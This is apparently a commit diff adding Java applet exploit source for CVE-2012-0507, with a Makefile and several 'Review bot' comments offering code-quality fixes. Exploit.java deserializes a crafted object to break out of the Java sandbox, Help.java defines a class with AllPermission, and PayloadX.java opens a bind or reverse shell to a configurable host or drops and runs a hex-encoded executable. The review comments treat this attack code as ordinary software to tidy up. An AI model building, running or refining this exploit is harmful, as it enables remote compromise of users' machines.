Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
Showing
5 changed files
with
530 additions
and
16 deletions.
@@ -1,23 +1,15 @@ | ||
JAR = CVE-2012-0507.jar | ||
JAR_FILE = CVE-2012-0507.jar | ||
|
||
CLASSES = \ | ||
msf/x/Exploit.java \ | ||
msf/x/Help.java \ | ||
msf/x/PayloadX.java | ||
all: ${JAR_FILE} | ||
|
||
${JAR_FILE}: src/a/Exploit.java src/a/Help.java src/msf/x/PayloadX.java | ||
javac -d bin -target 1.2 -source 1.2 src/a/*.java src/msf/x/*.java && (cd bin; jar cvf ../${JAR_FILE} `find . -name *.class`) | ||
|
||
.SUFFIXES: .java .class | ||
.java.class: | ||
javac -d bin -source 1.2 -target 1.2 $*.java | ||
|
||
all: $(CLASSES:.java=.class) | ||
(cd bin; jar cvf ../$(JAR) *) | ||
|
||
install: | ||
mv $(JAR) ../../../../data/exploits/ | ||
install: all | ||
mv ${JAR_FILE} ../../../../data/exploits/ | ||
|
||
clean: | ||
rm -f $(JAR) | ||
rm -rf bin/* | ||
rm -f ${JAR_FILE} | ||
find bin -name '*.class' -print0 | xargs -0 rm -f | ||
|
||
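Review bot: The jar-packaging recipe under the `${JAR_FILE}` rule leaves the find pattern unquoted, `find . -name *.class`, so the shell expands `*.class` against bin/ before find ever sees it; it only works because no class files sit at the top level of bin/. Quote it the way the `clean` target already does, `find . -name '*.class'`, so the two recipes agree. This rendering drops the +/- markers, so which of the two `all:` and two `install:` stanzas survive on the new side is inferred from the `JAR_FILE` naming rather than visible.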
|
191 changes: 191 additions & 0 deletions
191
external/source/exploits/CVE-2012-0507/bin/msf/x/PayloadX.java
@@ -0,0 +1,191 @@ | ||
package msf.x; | ||
|
||
import java.io.BufferedReader; | ||
import java.io.BufferedWriter; | ||
import java.io.File; | ||
import java.io.FileOutputStream; | ||
import java.io.InputStream; | ||
import java.io.InputStreamReader; | ||
import java.io.OutputStream; | ||
import java.io.OutputStreamWriter; | ||
import java.net.ServerSocket; | ||
import java.net.Socket; | ||
import java.security.AccessController; | ||
import java.security.PrivilegedExceptionAction; | ||
|
||
public class PayloadX implements PrivilegedExceptionAction | ||
{ | ||
// This will contain a hex string of the native payload to drop and execute. | ||
public static String data = null; | ||
public static String jar = null; | ||
// If no native payload is set we get either a java bind shell or a java | ||
// reverse shell. | ||
public static String lhost = null; | ||
public static int lport = 4444; | ||
|
||
class StreamConnector extends Thread | ||
{ | ||
InputStream is; | ||
OutputStream os; | ||
|
||
StreamConnector( InputStream is, OutputStream os ) | ||
{ | ||
this.is = is; | ||
this.os = os; | ||
} | ||
|
||
public void run() | ||
{ | ||
BufferedReader in = null; | ||
BufferedWriter out = null; | ||
|
||
try | ||
{ | ||
in = new BufferedReader( new InputStreamReader( is ) ); | ||
out = new BufferedWriter( new OutputStreamWriter( os ) ); | ||
char buffer[] = new char[8192]; | ||
int length; | ||
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) | ||
{ | ||
out.write( buffer, 0, length ); | ||
out.flush(); | ||
} | ||
} | ||
catch( Exception e ) {} | ||
|
||
try | ||
{ | ||
if( in != null ) | ||
in.close(); | ||
if( out != null ) | ||
out.close(); | ||
} | ||
catch( Exception e ) {} | ||
} | ||
} | ||
|
||
// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java | ||
public static byte[] StringToBytes( String s ) | ||
{ | ||
byte[] data = new byte[s.length() / 2]; | ||
|
||
for( int i = 0 ; i < s.length() ; i += 2 ) | ||
data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) ); | ||
|
||
return data; | ||
} | ||
|
||
public Object run() throws Exception | ||
{ | ||
//System.out.println("Running"); | ||
// if the native payload data has not been set just return for now, it | ||
// will be set by the next time we reach here. | ||
if( PayloadX.data == null && PayloadX.jar == null ) | ||
return null; | ||
//System.out.println("have either data or jar"); | ||
|
||
try | ||
{ | ||
String os = System.getProperty( "os.name" ); | ||
|
||
//System.out.println("OS: " + os); | ||
// if we have no native payload to drop and execute we default to | ||
// either a TCP bind or reverse shell. | ||
if( PayloadX.data.length() == 0 && PayloadX.jar.length() == 0 ) | ||
{ | ||
//System.out.println("no, exe/jar. Doing shell"); | ||
Socket client_socket = null; | ||
|
||
String shell = "/bin/sh"; | ||
|
||
if( os.indexOf( "Windows" ) >= 0 ) | ||
shell = "cmd.exe"; | ||
|
||
if( PayloadX.lhost == null ) | ||
{ | ||
ServerSocket server_socket = new ServerSocket( PayloadX.lport ); | ||
client_socket = server_socket.accept(); | ||
} | ||
else | ||
{ | ||
client_socket = new Socket( PayloadX.lhost, PayloadX.lport ); | ||
} | ||
|
||
if( client_socket != null ) | ||
{ | ||
Process process = exec( shell ); | ||
if( process != null ) | ||
{ | ||
( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); | ||
( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); | ||
} | ||
} | ||
} | ||
else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) ) | ||
{ | ||
//System.out.println("Dropping JAR"); | ||
String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar"; | ||
|
||
writeFile( path, StringToBytes( PayloadX.jar ) ); | ||
exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true"); | ||
} | ||
else | ||
{ | ||
//System.out.println("Dropping EXE"); | ||
String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe"; | ||
|
||
writeFile( path, StringToBytes( PayloadX.data ) ); | ||
if( os.indexOf( "Windows" ) < 0 ) | ||
{ | ||
exec( "chmod 755 " + path ); | ||
} | ||
exec( path ); | ||
new File( path ).delete(); | ||
} | ||
} | ||
catch( Exception e ) { | ||
//System.out.println(e); | ||
} | ||
|
||
return null; | ||
} | ||
|
||
public Process exec( String path ) | ||
{ | ||
Process p = null; | ||
//System.out.println( "Executing" ); | ||
try { | ||
p = Runtime.getRuntime().exec( path ); | ||
if( p == null ) | ||
{ | ||
//System.out.println( "Null process, crap" ); | ||
} | ||
p.waitFor(); | ||
} catch( Exception e ) { | ||
//System.out.println(e); | ||
} | ||
return p; | ||
} | ||
|
||
public void writeFile( String path, byte[] data ) | ||
{ | ||
//System.out.println( "Writing file" ); | ||
try { | ||
FileOutputStream fos = new FileOutputStream( path ); | ||
|
||
fos.write( data ); | ||
fos.close(); | ||
} catch( Exception e ) { | ||
//System.out.println(e); | ||
} | ||
} | ||
|
||
public PayloadX() | ||
{ | ||
try | ||
{ | ||
AccessController.doPrivileged( this ); | ||
} | ||
catch( Exception e ) {} | ||
} | ||
} |
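Review bot: `writeFile` opens a `FileOutputStream` and closes it only on the success path, so a failing `write` leaks the descriptor; wrap it as `try { fos.write( data ); } finally { fos.close(); }`. In `exec`, the empty `if( p == null )` block is dead code, since `Runtime.exec` throws rather than returning null, and should either be removed or become an early `return null;` ahead of `p.waitFor()`. `StringToBytes` duplicates `Exploit.StringToBytes` byte for byte; one copy with a doc comment stating that it expects an even-length hex string (an odd length throws `StringIndexOutOfBoundsException` on the last digit) would do. The `catch( Exception e ) {}` blocks discard the exception entirely; if that is deliberate, name the variable `ignored` and say why in a comment.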
@@ -0,0 +1,58 @@ | ||
package a; | ||
|
||
import java.applet.Applet; | ||
import java.io.ByteArrayInputStream; | ||
import java.io.ObjectInputStream; | ||
import java.util.concurrent.atomic.AtomicReferenceArray; | ||
import a.*; | ||
|
||
// Referenced classes of package a: | ||
// Help | ||
|
||
public class Exploit extends Applet | ||
{ | ||
|
||
public Exploit() | ||
{ | ||
} | ||
|
||
public static byte[] StringToBytes(String s) | ||
{ | ||
byte abyte0[] = new byte[s.length() / 2]; | ||
for(int i = 0; i < s.length(); i += 2) | ||
abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16)); | ||
|
||
return abyte0; | ||
} | ||
|
||
public void init() | ||
{ | ||
try | ||
{ | ||
String as[] = { | ||
"ACED0005757200135B4C6A6176612E6C616E672E4F62", "6A6563743B90CE589F1073296C020000787000000002", "757200095B4C612E48656C703BFE2C941188B6E5FF02", "000078700000000170737200306A6176612E7574696C", "2E636F6E63757272656E742E61746F6D69632E41746F", "6D69635265666572656E63654172726179A9D2DEA1BE", "65600C0200015B000561727261797400135B4C6A6176", "612F6C616E672F4F626A6563743B787071007E0003" | ||
}; | ||
StringBuilder stringbuilder = new StringBuilder(); | ||
for(int i = 0; i < as.length; i++) | ||
stringbuilder.append(as[i]); | ||
|
||
ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(StringToBytes(stringbuilder.toString()))); | ||
Object aobj[] = (Object[])(Object[])objectinputstream.readObject(); | ||
Help ahelp[] = (Help[])(Help[])aobj[0]; | ||
AtomicReferenceArray atomicreferencearray = (AtomicReferenceArray)aobj[1]; | ||
ClassLoader classloader = getClass().getClassLoader(); | ||
atomicreferencearray.set(0, classloader); | ||
Help _tmp = ahelp[0]; | ||
|
||
String data = getParameter( "data" ); | ||
String jar = getParameter( "jar" ); | ||
String lhost = getParameter( "lhost" ); | ||
String lport = getParameter( "lport" ); | ||
System.out.println("go go go"); | ||
Help.doWork(ahelp[0], this, data, jar, lhost, ( lport == null ? 4444 : Integer.parseInt( lport ) )); | ||
} | ||
catch(Exception exception) { | ||
System.out.println(exception.getMessage()); | ||
} | ||
} | ||
} |
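Review bot: `init` still carries decompiler artifacts and debug output: the doubled casts `(Object[])(Object[])` and `(Help[])(Help[])` on the `readObject` result, the apparently unused local `Help _tmp = ahelp[0];`, the redundant `import a.*;` inside package `a`, and the `System.out.println("go go go");` line. The catch block prints only `exception.getMessage()`, which is null for many runtime exceptions and drops the stack trace; `exception.printStackTrace();` or at least `exception.toString()` keeps the cause visible. `Integer.parseInt( lport )` failures land in that same catch-all, so a malformed parameter is indistinguishable from any other failure in the output.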
@@ -0,0 +1,82 @@ | ||
package a; | ||
|
||
import java.io.ByteArrayOutputStream; | ||
import java.io.IOException; | ||
import java.io.InputStream; | ||
import java.io.ObjectInputStream; | ||
import java.io.ObjectOutputStream; | ||
import java.io.Serializable; | ||
import java.net.URL; | ||
import java.security.AllPermission; | ||
import java.security.CodeSource; | ||
import java.security.Permissions; | ||
import java.security.ProtectionDomain; | ||
import java.security.cert.Certificate; | ||
import java.lang.reflect.Field; | ||
|
||
public class Help extends ClassLoader implements Serializable{ | ||
public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) { | ||
|
||
String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" }; | ||
String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" }; | ||
Class cls = null; | ||
|
||
try | ||
{ | ||
for( int index=0 ; index<classNames.length ; index++ ) | ||
{ | ||
|
||
ByteArrayOutputStream bos = new ByteArrayOutputStream(); | ||
byte[] buffer = new byte[8192]; | ||
int length; | ||
|
||
// read in the class file from the jar | ||
InputStream is = expl.getClass().getResourceAsStream( classPaths[index] ); | ||
// and write it out to the byte array stream | ||
while( ( length = is.read( buffer ) ) > 0 ) | ||
bos.write( buffer, 0, length ); | ||
// convert it to a simple byte array | ||
buffer = bos.toByteArray(); | ||
|
||
URL url = new URL( "file:///" ); | ||
|
||
Certificate[] certs = new Certificate[0]; | ||
|
||
Permissions perm = new Permissions(); | ||
perm.add( new AllPermission() ); | ||
|
||
ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm ); | ||
|
||
cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd ); | ||
Class class_cls = cls.getClass(); | ||
System.out.println("The type of the object is: " + class_cls.getName()); | ||
} | ||
|
||
// cls will end up being the PayloadX class | ||
if( cls != null ) | ||
{ | ||
// reflect into the PayloadX class to get these three fields | ||
Field payload_data = cls.getField( "data" ); | ||
Field payload_jar = cls.getField( "jar" ); | ||
Field payload_lhost = cls.getField( "lhost" ); | ||
Field payload_lport = cls.getField( "lport" ); | ||
|
||
// instantiate the PayloadX object once so as we can set the native payload data | ||
Object obj = cls.newInstance(); | ||
|
||
// set the native payload data, lhost and lport | ||
payload_data.set( obj, data ); | ||
payload_jar.set( obj, jar ); | ||
payload_lhost.set( obj, lhost ); | ||
payload_lport.setInt( obj, lport ); | ||
|
||
// instantiate a second PayloadX object to perform the actual payload | ||
obj = cls.newInstance(); | ||
} | ||
} | ||
catch( Exception e ) { | ||
System.out.println(e.getMessage()); | ||
} | ||
} | ||
} | ||
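Review bot: The debug line `System.out.println("The type of the object is: " + class_cls.getName());` always prints `java.lang.Class`, because `cls.getClass()` is the class of the `Class` object rather than the class just defined; `cls.getName()` is presumably what was meant, and the `class_cls` local can go. The `InputStream is` returned by `getResourceAsStream` is never closed, and when the resource is missing it is null, which surfaces only as a `NullPointerException` whose `getMessage()` is null in the catch block. `url`, `certs` and `perm` are rebuilt on every loop iteration although none of them depends on `index`; hoisting them above the `for` makes the per-class work easier to read.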
|